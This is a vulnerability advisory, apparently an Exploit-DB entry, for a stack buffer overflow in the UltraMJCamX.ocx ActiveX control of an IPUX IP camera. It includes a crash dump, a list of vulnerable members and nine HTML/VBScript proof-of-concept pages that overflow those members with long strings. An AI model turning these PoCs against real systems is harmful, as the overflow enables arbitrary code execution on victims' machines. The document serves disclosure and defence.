IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow

vendor:

IPUX Cube Type CS303C IP Camera

by:

Gjoko 'LiquidWorm' Krstic

7,5

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: IPUX Cube Type CS303C IP Camera

Affected Version From: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)

Affected Version To: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)

Patch Exists: Yes

Related CWE: N/A

CPE: a:big_good_holdings_limited:ipux_cube_type_cs303c_ip_camera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows 7 Professional SP1 (EN)

2014

IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow

The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to several functions in UltraMJCamLib, resulting in memory corruption overwriting several registers including the SEH. An attacker can gain access to the system of the affected node and execute arbitrary code.

Mitigation:

Update to the latest version of the software

Source

Exploit-DB raw data:


IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow


Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
Product web page: http://www.ipux.net | http://www.fitivision.com
Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)

Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
Motion JPEG video compression, the file size of video stream is extremely reduced,
as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
illuminators for both day and night applications.

Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions in
UltraMJCamLib, resulting in memory corruption overwriting several registers including
the SEH. An attacker can gain access to the system of the affected node and execute
arbitrary code.

----------------------------------------------------------------------------------

(48d0.2e98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx - 
eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
ntdll!RtlDeleteCriticalSection+0x77:
7796466c 833800          cmp     dword ptr [eax],0    ds:002b:41414149=????????

----------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5214
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php


16.11.2014

---


Properties:
-----------

FileDescription		UltraMJCam ActiveX Control
FileVersion		1, 0, 52, 23
InternalName		UltraMJCamX
OriginalFileName	UltraMJCamX.ocx
ProductName		UltraMJCam device ActiveX Control
ProductVersion		1, 0, 52, 23


List of members:
----------------

Interface IUltraMJCamX : IDispatch
Default Interface: True
Members : 65
	RemoteHost
	RemotePort
	AccountCode
	GetConfigValue
	SetConfigValue
	SetCGIAPNAME
	Password
	UserName
	fChgImageSize
	ImgWidth
	ImgHeight
	SnapFileName
	AVIRecStart
	SetImgScale
	OpenFolder
	OpenFileDlg
	TriggerStatus
	AVIRecStatus
	Event_Frame
	PlayVideo
	SetAutoScale
	Event_Signal
	WavPlay
	CGI_ParamGet
	CGI_ParamSet
	MulticastEnable
	MulticastStatus
	SetPTUserAllow
	SetLanguage
	TimestampEnable
	TimestampStroke


Vulnerable members of the class:
--------------------------------

RemoteHost
AccountCode
SetCGIAPNAME
Password
Username
SnapFileName
OpenFolder
CGI_ParamGet
CGI_ParamSet


PoC(s):
-------


---1


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let RemoteHost As String"
memberName = "RemoteHost"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(1044, "A")
target.RemoteHost = arg1
</script>
</html>


---2


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let AccountCode As String"
memberName = "AccountCode"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(3092, "A")
target.AccountCode = arg1
</script>
</html>


---3


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let SetCGIAPNAME As String"
memberName = "SetCGIAPNAME"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(3092, "A")
target.SetCGIAPNAME = arg1
</script>
</html>


---4


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let Password As String"
memberName = "Password"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(2068, "A")
target.Password = arg1
</script>
</html>


---5


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let UserName As String"
memberName = "UserName"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(4116, "A")
target.UserName = arg1
</script>
</html>


---6


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(4116, "A")
target.SnapFileName = arg1
</script>
</html>


---7


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
memberName = "OpenFolder"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 1
arg1=String(5140, "A")
target.OpenFolder arg1 
</script>
</html>


---8


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Function CGI_ParamGet ( ByVal sGroup As String ,  ByVal sName As String ) As String"
memberName = "CGI_ParamGet"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 2
arg1=String(4116, "A")
arg2="defaultV"
target.CGI_ParamGet arg1 ,arg2 
</script>
</html>


---9


<html>
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
prototype  = "Function CGI_ParamSet ( ByVal sGroup As String ,  ByVal sName As String ,  ByVal SVal As String ) As Long"
memberName = "CGI_ParamSet"
progid     = "UltraMJCamLib.UltraMJCamX"
argCount   = 3
arg1=String(10260, "A")
arg2="defaultV"
arg3="defaultV"
target.CGI_ParamSet arg1 ,arg2 ,arg3 
</script>
</html>